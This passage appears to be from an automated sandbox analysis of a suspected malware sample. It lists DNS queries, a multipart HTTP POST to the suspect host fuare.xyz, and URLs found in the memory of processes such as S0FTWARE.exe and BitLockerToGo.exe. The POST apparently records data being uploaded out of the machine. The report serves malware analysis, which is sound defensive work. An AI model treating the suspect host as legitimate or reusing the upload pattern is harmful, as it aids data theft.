                        Source: global traffic - DNS traffic detected: DNS query: clients2.googleusercontent.com
                        Source: global traffic - DNS traffic detected: DNS query: sb.scorecardresearch.com
                        Source: global traffic - DNS traffic detected: DNS query: assets.msn.com
                        Source: global traffic - DNS traffic detected: DNS query: c.msn.com
                        Source: global traffic - DNS traffic detected: DNS query: api.msn.com
                        Source: global traffic - DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                        Source: global traffic - DNS traffic detected: DNS query: bitbucket.org
                        Source: global traffic - DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                        Source: unknown - HTTP traffic detected:
                            POST / HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE
                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                            Host: fuare.xyz
                            Content-Length: 256
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
                        Source: chrome.exe, 00000005.00000003.2651117542.000007C000A10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2651090943.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2650410030.000007C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                        Source: chrome.exe, 00000005.00000002.2733918596.000007C000668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                        Source: svchost.exe, 00000006.00000002.3284832870.0000028B2AE0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.3039650772.0000015B47CD0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.5172346985.0000015B47CCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7
                        Source: chrome.exe, 00000005.00000002.2736370265.000007C000990000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2673863880.000007C000E4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwy
                        Source: svchost.exe, 00000006.00000003.2646192989.0000028B2ACB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: chrome.exe, 00000005.00000002.2730658183.000007C000050000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: S0FTWARE.exe, 00000000.00000002.2233426757.0000000001C9E000.00000008.00000001.01000000.00000003.sdmp, S0FTWARE.exe, 00000000.00000000.2022629445.0000000001C9E000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                        Source: chrome.exe, 00000005.00000003.2654975325.000007C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655160411.000007C000F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654686658.000007C000F78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2655402959.000007C00108C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                        Source: chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733802471.000007C00063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: chrome.exe, 00000005.00000002.2731148106.000007C00012C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.co
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2730625918.000007C00001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000002.2829522376.00007CF00016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                        Source: chrome.exe, 00000005.00000002.2733989529.000007C000698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                        Source: chrome.exe, 00000005.00000002.2741799614.000007C0012B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740718077.000007C00102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
